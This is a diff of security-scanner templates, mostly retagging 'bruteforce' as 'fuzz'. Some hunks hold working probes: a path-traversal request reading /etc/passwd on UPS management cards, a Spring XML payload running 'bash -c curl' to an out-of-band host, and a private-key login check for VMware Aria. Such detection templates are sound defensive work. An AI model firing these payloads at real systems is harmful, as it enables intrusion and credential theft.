# digest: 4b0a004830460221009bb41d08061c1ba58f9ba9d6da08c33ade50b3877f2e7aec5ecd20bb45a8b2f6022100e43b897605b6c1cb2720b460ebe592eceecec9662a9b51717e07568020ebcee2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502207f1f208de9031454a3413b7b13977ee8f563be5c0ad83771de6897fa56a46c7f022100ab113072a9c2f91610fedd3a50cae51b16e01fca22b04c80bfdd675f86c0e45b:922c64590222798bb761d5b6d8e72950
|
|
@ -45,4 +45,4 @@ http:
|
|||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
# digest: 4a0a004730450220530a89eabafecafbf0a3de2f0ba62e33e25cefd85b20289a912eb5a15603ad51022100c63b246226590dd18a0c6e10508d8c5aed77d6ba23037197d980799866a876c1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502210087a307489eb418f0906031bfc714587a7a63d61d3d748d51d61d33634454363502205b0a0800d1c4a85649d92cc90161e84a8539243c735643c99f74bc57483a3d77:922c64590222798bb761d5b6d8e72950
|
|
@ -13,7 +13,7 @@ info:
|
|||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 341
|
||||
tags: bruteforce,mdb,asp
|
||||
tags: fuzz,mdb,asp
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -44,4 +44,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502207843690e40ef53160e535662659535e27e49d4c23da29954cf7bae6db715b98c022100b90846e49879ba649cdd9e5bf68edd48a79c2d56641eaaa31d184f794a2e5d7f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a9c05c6a0c6579c0639a578b69157823126b4bc4badc33f4dcb52408d2fbd2960220798dd8340f94afec52275e40be3cdcf758b8a052afb2e0233aa34653cb33f22d:922c64590222798bb761d5b6d8e72950
|
|
@ -41,4 +41,4 @@ http:
|
|||
group: 2
|
||||
regex:
|
||||
- '<version>(<!\[CDATA\[)?([0-9.]+)'
|
||||
# digest: 480a00453043021f14baaa0b076a2383aaab7e8b12ff5b1cc3a99adc343d2ec8387b72d652471402205dd96fa59febb8d09977684cc0944a47a5b5ae3a38a37643da069caebd330962:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022000c79d13083e771d6537a2043861c4ba6c2cb53693cde7fef5e1b20d86c52b070221009b43b0876fcac5d7ed73100bb4429edb23cbd9cd5e60bc1262ec97f501f2c9f4:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://twitter.com/ImoJOnDz/status/1649089777629827072
|
||||
metadata:
|
||||
max-request: 9
|
||||
tags: ssrf,proxy,oast,bruteforce
|
||||
tags: ssrf,proxy,oast,fuzz
|
||||
|
||||
http:
|
||||
- payloads:
|
||||
|
@ -44,4 +44,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402206be4527be73a1a8aaf704109373b9377f5e8bb8392a592501c5058465df0471902200f9adedf455a7f7693921716076874158203e3a0e5406f09455f406e26aeca7a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a67262dade744735b407460dddcbd5a203e9b5f727aa16b5c330df7272a6b861022038ed13f440b833327d52a233383b13bc6a9cd1ee7cf5bb2922c88e4b5c0a6960:922c64590222798bb761d5b6d8e72950
|
|
@ -22,4 +22,4 @@ http:
|
|||
part: header
|
||||
words:
|
||||
- "COMPASS"
|
||||
# digest: 4a0a0047304502200edc0a5fa3514b05b3d4ce38fcbb898a89899c0fc3a18fabc6a34b166367782e022100d87c600c6cf948cfb36b407fec959e5497b49e343a13f571b4e7a2598b1979f1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220173dd3ccec570c2d5733e4d455286748ff4709a84688d038c8fec9746546c45b022100cee1597a2837410bd6e0fd7635536ddac9a8d293c43439c064d07e3e618b4e7d:922c64590222798bb761d5b6d8e72950
|
|
@ -791,4 +791,4 @@ http:
|
|||
- '(?)content="CloudWAF"'
|
||||
- 'Server: CloudWAF'
|
||||
- 'Set-Cookie: HWWAFSESID='
|
||||
# digest: 4a0a00473045022100cc858e9365b5bcfb441851a229e722ebcc673b7dcf0fe930bea0fe5d8954cf140220661071f8223b6b31c6bc77ce8f9643c077616a08ab412f211c1f2773341530a5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220275dcc9d58d2ffaa091cd84f5b5ecb66c741d4fa2efa3de2b32dece8e7797fba022100d831918396c34900b70d06c6098b07c962117058264d35a02779d8a0be73ff58:922c64590222798bb761d5b6d8e72950
|
|
@ -34,4 +34,4 @@ http:
|
|||
regex:
|
||||
- "===\\s(.*)\\s===" # extract the plugin name
|
||||
- "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
|
||||
# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200e48b2e398c9ec8a1559e96019434ea839eb470a98d198af18a947332f02113f022100b17c8201e44fb304f1e57baa15a4e848388a42fbce942358454565d1658facb2:922c64590222798bb761d5b6d8e72950
|
|
@ -26,4 +26,4 @@ http:
|
|||
- type: word
|
||||
words:
|
||||
- "== Description =="
|
||||
# digest: 490a0046304402205e9f7b61bf29869a2a1dc2da01f5bd8bbd23c0db195ed14cb6ad78d431cf7fa2022022903f13f5ee4a17cee2b1ed42eff80e29a72f3a0da7a463acc2e9121cbf1ed2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220480caf586b5c260399e7e884b1e6c1e572a4bab84eae480feeb084868b38fa6702210092094fb5cb64bdfb9ff293289f131e98cb1dd8eb2d6a28cfa791db49afc7dac4:922c64590222798bb761d5b6d8e72950
|
|
@ -14,7 +14,7 @@ info:
|
|||
cwe-id: CWE-1391
|
||||
metadata:
|
||||
max-request: 276
|
||||
tags: wordpress,default-login,bruteforce
|
||||
tags: wordpress,default-login,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -45,4 +45,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 302
|
||||
# digest: 4b0a004830460221008e46a934459d64782ed14afbd9e908a5cb090a14f0b0ac3a18d94aab84b1880b022100dc8c92494fac2b31cc1fe4a03635e9c39622cfdf0f552a5344cb759d3c6904d3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200c1408ee282f07a88d599b6e9e31b0bdb3d2e4fd0f027c30193d370a45b896ff022066ac3030dc876bd69dd867e59e9e985c250becbe504d1274ce392ae5436e1758:922c64590222798bb761d5b6d8e72950
|
|
@ -32,4 +32,4 @@ http:
|
|||
- "status_code_1 == 403 && status_code_2 != 403"
|
||||
- "status_code_1 == 403 && status_code_3 != 403"
|
||||
condition: or
|
||||
# digest: 4a0a00473045022100ec5ba858cbe1e05e3174848d9069a308fe6fc8077ad9cb3e5be3ea5e8941e8ea02205590d97ee522844eceb4ac02f8368d35939a46b86594c2387cac974a52c6ae50:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221009c6175d4b394663b87da93b68f083bbdad28dce54149dfb1290a8d72f43f7a86022100e3c72e653388184addb6bb02348f7f214a0d29d5446b0bc87c4d026860c08b01:922c64590222798bb761d5b6d8e72950
|
|
@ -16,7 +16,7 @@ info:
|
|||
metadata:
|
||||
verified: true
|
||||
max-request: 85
|
||||
tags: misc,defacement,spam,hacktivism,bruteforce
|
||||
tags: misc,defacement,spam,hacktivism,fuzz
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -413,4 +413,4 @@ http:
|
|||
- /frost.txt
|
||||
- /-.txt
|
||||
- /!.txt
|
||||
# digest: 4b0a00483046022100f218ea0fd53ebf337b31b0b7ee9c3dbffec2b02ae4c275a4c933000c18056da2022100c7cfc9b6a0ac0b1ea92a4ae62cab623625d5710beecdf52408211b33d596c21c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a121574bdd704d284d1675f8721914e3c675e5c66a64c266753135d55836c43502206ab7dff5cb3dad67f1cb2e163b6c7d49d464498f2b1195d03bd3629a7a056f1f:922c64590222798bb761d5b6d8e72950
|
|
@ -8,7 +8,7 @@ info:
|
|||
- https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666
|
||||
metadata:
|
||||
max-request: 47
|
||||
tags: miscellaneous,misc,bruteforce,windows
|
||||
tags: miscellaneous,misc,fuzz,windows
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -82,4 +82,4 @@ http:
|
|||
- type: kval
|
||||
kval:
|
||||
- 'www_authenticate'
|
||||
# digest: 490a0046304402200998332a900ab3a010afc671de86d7e0dce353842f87b01101f55fc8d3dfa8680220470194bf7c344099f16ae411b214e3f983275e7c5eb172f3d2fb448b8b16921a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205d7dadfbaf6f4fa5ee42494a2c579a1e1e673e8326c6524b66a397b17b38644002210099a781aec9fa8081e77aa23d7f6b6a14046ccd4ef8fd390b6376781f660d71ac:922c64590222798bb761d5b6d8e72950
|
|
@ -8,7 +8,7 @@ info:
|
|||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: http.component:"Adobe Experience Manager"
|
||||
tags: aem,bruteforce,misconfig
|
||||
tags: aem,misconfig
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -32,4 +32,4 @@ http:
|
|||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
# digest: 4b0a004830460221009f1fe9c087a47f4eaaa650529a28a4b5b4611e7feaf4501045633287cc9eb2af022100f9fb5b48056e18a956395b5cb8fd9231af85504f7816f4fd0c9b982bc1a52549:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950
|
|
@ -9,7 +9,7 @@ info:
|
|||
metadata:
|
||||
max-request: 100
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: gitlab,enum,misconfig,bruteforce
|
||||
tags: gitlab,enum,misconfig,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -38,4 +38,4 @@ http:
|
|||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
# digest: 490a004630440220562a9f8ba6edfa7b4aee0ee747db5bea2b7a92f48e4880e87f7c2c0e1f0e53350220284a8c20ed6356ee243fe41581351c7cdafc9037099d94a5f34a45813725f77f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205c9c86f3c046857119bb1a670b24f3214292931dc0fa8f3f2de2a774d270003f0220494fa1162786a29761083cf667b6d9634363502ffaa72629ab5c9ad4ac70494a:922c64590222798bb761d5b6d8e72950
|
|
@ -3,12 +3,12 @@ id: drupal-install
|
|||
info:
|
||||
name: Drupal Install
|
||||
author: NkxxkN
|
||||
severity: low
|
||||
severity: high
|
||||
description: Drupal Install panel exposed.
|
||||
metadata:
|
||||
max-request: 2
|
||||
shodan-query: http.component:"drupal"
|
||||
tags: exposure,drupal
|
||||
tags: misconfig,drupal,install,exposure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -23,4 +23,4 @@ http:
|
|||
- type: word
|
||||
words:
|
||||
- "<title>Choose language | Drupal</title>"
|
||||
# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950
|
|
@ -16,7 +16,7 @@ info:
|
|||
cwe-id: CWE-441
|
||||
metadata:
|
||||
max-request: 25
|
||||
tags: exposure,config,proxy,misconfig,bruteforce
|
||||
tags: exposure,config,proxy,misconfig,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -135,4 +135,4 @@ http:
|
|||
- (!contains(body_1, "ssh")) && ((contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh"))
|
||||
- (!contains(body_1, "SSH")) && ((contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH"))
|
||||
condition: or
|
||||
# digest: 4b0a004830460221009f48b01f26136702795a2cffb7b6b7816d70dea40d4ab51925b3e3bf0c11b6af0221008563de6541e201ff78bf5ab81bf17f7a208c87c839acd797ffe0b201c82f550f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100eb06c1baf9b355cae11480ca66689b197c6d0fe975d34a9e5cf6c0a7ce2db424022100de87b67ae05bd14e68e9ff47470c1726b431bafbb4f67c5c9dd7b6b4d93c1456:922c64590222798bb761d5b6d8e72950
|
|
@ -16,7 +16,7 @@ info:
|
|||
cwe-id: CWE-441
|
||||
metadata:
|
||||
max-request: 6
|
||||
tags: exposure,config,proxy,misconfig,bruteforce
|
||||
tags: exposure,config,proxy,misconfig,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -60,4 +60,4 @@ http:
|
|||
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
|
||||
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
|
||||
- (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works"))
|
||||
# digest: 4a0a00473045022050f32d433907eb641719e6b7b39ff4bb5fbcf7f2001078134c78c7c7eb85058f0221009485e32b4f5ae470fb7df0b41a812d9f95bc1be46caa1c5a0979f2779bcc299e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204a69f7542ff2a50a4165edd9f554e7c7c52121f127a95bcb8f97c86b4affaf7c0220716d16b16fa8d641d6645b0bc6d82b3b3a5be1554d8b650f469656640b38ee7f:922c64590222798bb761d5b6d8e72950
|
|
@ -16,7 +16,7 @@ info:
|
|||
cwe-id: CWE-441
|
||||
metadata:
|
||||
max-request: 8
|
||||
tags: exposure,config,proxy,misconfig,bruteforce
|
||||
tags: exposure,config,proxy,misconfig,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -61,4 +61,4 @@ http:
|
|||
- (!regex("(?i)SSH-[.]+-+",body_1)) && (!regex("(?i)SSH-[.]+-+",body_2)) && (regex("(?i)SSH-[.]+-+",body_4))
|
||||
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
|
||||
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
|
||||
# digest: 4a0a0047304502210081f5f214233f6f6cf91e16579381ca30fc0ce8dcf65f0a90f70a1e8d06d24d84022078ceab298b767ed7830bd6f6b69ea8c510687cc8937183784815309cc9cbb294:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ea2fb3ebd78e1c5f154da5c2752dc9b4c3072b6969bbd2eb1e471d806a1e587502205b65830d95619ed72f037ad2ab405b591674b9feb52e35a4d44a6cb84db66ddb:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,28 @@
|
|||
id: directus-detect
|
||||
|
||||
info:
|
||||
name: Directus - Detect
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
description: |
|
||||
Directus is a content manager with dynamic access API generation and transparent integration with the main databases.
|
||||
reference:
|
||||
- https://directus.io/
|
||||
metadata:
|
||||
max-request: 1
|
||||
google-query: 'X-Powered-By: Directus'
|
||||
verified: true
|
||||
tags: tech,directus,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "X-Powered-By: Directus"
|
||||
case-insensitive: true
|
||||
# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950
|
|
@ -11417,6 +11417,7 @@ http:
|
|||
name: softether-vpn
|
||||
words:
|
||||
- <li>manage this vpn server or vpn bridge<ul>
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
name: softnext-spam
|
||||
|
@ -15064,4 +15065,4 @@ http:
|
|||
words:
|
||||
- "x-dispatcher:"
|
||||
case-insensitive: true
|
||||
# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950
|
|
@ -13,7 +13,7 @@ info:
|
|||
verified: true
|
||||
max-request: 50
|
||||
shodan-query: Graylog
|
||||
tags: tech,graylog,api,swagger,bruteforce
|
||||
tags: tech,graylog,api,swagger,fuzz
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -88,4 +88,4 @@ http:
|
|||
- "status_code == 401"
|
||||
- "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')"
|
||||
condition: and
|
||||
# digest: 490a0046304402205f8ec88c8c872e1f72f827d27f188fb5cf33790e02129f8c031dcf388ae2267302206b1141795fc1f4b771b9f166252c932adacbd6f72f94e352eb1e0e392659f9d4:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950
|
|
@ -9,11 +9,14 @@ info:
|
|||
max-request: 1
|
||||
tags: tech,microsoft,iis
|
||||
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 4
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -21,14 +24,9 @@ http:
|
|||
words:
|
||||
- "IIS"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- Server
|
||||
|
||||
# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,25 @@
|
|||
id: wing-ftp-service-detect
|
||||
|
||||
info:
|
||||
name: Wing FTP Service - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: |
|
||||
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
shodan-query: "Wing FTP Server"
|
||||
tags: tech,ftp,wing,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Wing FTP Server"
|
||||
# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,38 @@
|
|||
id: ups-network-lfi
|
||||
|
||||
info:
|
||||
name: UPS Network Management Card 4 Path Traversal
|
||||
author: Kazgangap
|
||||
severity: high
|
||||
description: |
|
||||
UPS Network Management Card version 4 suffers from a path traversal vulnerability.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt
|
||||
- https://www.exploit-db.com/exploits/51897
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
shodan-query: html:"UPS Network Management Card 4"
|
||||
tags: ups,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100f89ac4d5fc64a14de49e8cb3c38e50b5639b4232cf5be0590f1bfdc1d4a6984f0220378dff779681382e54be7b3f7a240fff7417804e84cb9fc58c17e2c84cb04e0f:922c64590222798bb761d5b6d8e72950
|
|
@ -14,7 +14,7 @@ info:
|
|||
shodan-query: title:"通达OA"
|
||||
fofa-query: title="通达OA"
|
||||
zoomeye-query: app:"通达OA"
|
||||
tags: tongda,auth-bypass,bruteforce
|
||||
tags: tongda,auth-bypass,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -37,4 +37,4 @@ http:
|
|||
- "status_code_1 == 200 && status_code_2 == 200"
|
||||
- "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')"
|
||||
condition: and
|
||||
# digest: 490a0046304402204a06da29f8ed74b30b3c4ab83d3cc755122295c433b365b4826bb259ca49790402202ad3e465c123744f61cdbec2d6264a43a222ffa353f4343897a41deecc126215:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
|
||||
metadata:
|
||||
max-request: 276
|
||||
tags: wordpress,php,xmlrpc,bruteforce
|
||||
tags: wordpress,php,xmlrpc,fuzz
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -50,4 +50,4 @@ http:
|
|||
- 'xmlrpc'
|
||||
- 'isAdmin'
|
||||
condition: and
|
||||
# digest: 4a0a0047304502210099e858a727502be5806faf777940504e60eb4ff367ce58779cbd952547018c3502207b54c8f1b32b85f47ed048a7fd956cbbd58a85fdf1895e055b89e9bc1ed0653d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100edfa1eaae603d4a662ebaa0eaddba9894ee90c4bd3431bcaae13280d7e9c2fa5022027b501e990478aaca56cc4162f495540c80217172b1c28e0b1516864f9913ad8:922c64590222798bb761d5b6d8e72950
|
|
@ -29,7 +29,8 @@ info:
|
|||
verified: true
|
||||
vendor: vmware
|
||||
product: aria_operations_for_networks
|
||||
tags: js,packetstorm,cve,cve2019,vmware,aria,rce,bruteforce,vrealize
|
||||
tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize
|
||||
|
||||
variables:
|
||||
keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
|
||||
|
||||
|
@ -64,4 +65,4 @@ javascript:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- success && response
|
||||
# digest: 4b0a004830460221009feafd85e7304801a5d27779281ba1e404c8bf1c26f4d8e443ace45603abfd980221009be9e788b356d6cf16aae887e936303bd2c812545e058d765238b4d65fbac6b2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a0048304602210096baa6d7adfe80f8e87172810d28e0fb98afca70b4c7081653717d290b1c455e022100f8f25d688999956d0f6f18c2c522b6946f46e35c415fe928b97369971def3226:922c64590222798bb761d5b6d8e72950
|
|
@ -40,7 +40,7 @@ javascript:
|
|||
let b = m2.Buffer();
|
||||
let name=Host+':'+Port;
|
||||
let conn = m1.Open('tcp', name);
|
||||
let randomvar = '{{randstr}}'
|
||||
let randomvar = '{{randstr}}'.toLowerCase();
|
||||
var Base64={encode: btoa}
|
||||
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
|
||||
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
|
||||
|
@ -61,4 +61,4 @@ javascript:
|
|||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'contains(interactsh_request, response)'
|
||||
condition: and
|
||||
# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950
|
|
@ -7,7 +7,7 @@ info:
|
|||
metadata:
|
||||
max-request: 223
|
||||
shodan-query: port:1433
|
||||
tags: js,ssh,default-login,network,bruteforce
|
||||
tags: js,ssh,default-login,network,fuzz
|
||||
|
||||
javascript:
|
||||
- pre-condition: |
|
||||
|
@ -37,4 +37,4 @@ javascript:
|
|||
- "response == true"
|
||||
- "success == true"
|
||||
condition: and
|
||||
# digest: 4a0a0047304502201075a52fb072b30eaf6d0a90a65cfd28bb977d1e550dea81be5fdf48eb9d4a40022100d71ccf516beef02a23e98f5041349bad1edefa0e3c4d4f83d7a3789ceb5c26e9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022014aa9c1a1b17b3914b4ba3f3233452eebae9a55538d97c0e80eda65e1d207f4d022100bb2595041170eae66cc6dd5fcbf9b33a0b3d61a92fe5a77c1aa48a600f8f420c:922c64590222798bb761d5b6d8e72950
|
|
@ -12,7 +12,7 @@ info:
|
|||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: network,mysql,bruteforce,db,misconfig
|
||||
tags: network,mysql,db,misconfig
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
|
@ -23,4 +23,4 @@ tcp:
|
|||
- type: word
|
||||
words:
|
||||
- "mysql_native_password"
|
||||
# digest: 490a00463044022035dcdfe3a3a04ff5cd925e153aac37f32ffd2ce11c80930db28848f2858ae91c0220477ec8d91cdb25472d209662968dbdfbe66331774355dd1b02db883d28c53906:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220271c76e40a4a3b9020fe8bf117a2f647a67b98bca02aa2eab3cab74bd6853b7c022100f4fb333ac1fd78a79bab65871e12be4c741ce43d3347f9f742029f49033216b1:922c64590222798bb761d5b6d8e72950
|
|
@ -11,7 +11,7 @@ info:
|
|||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: network,tidb,bruteforce,db,misconfig
|
||||
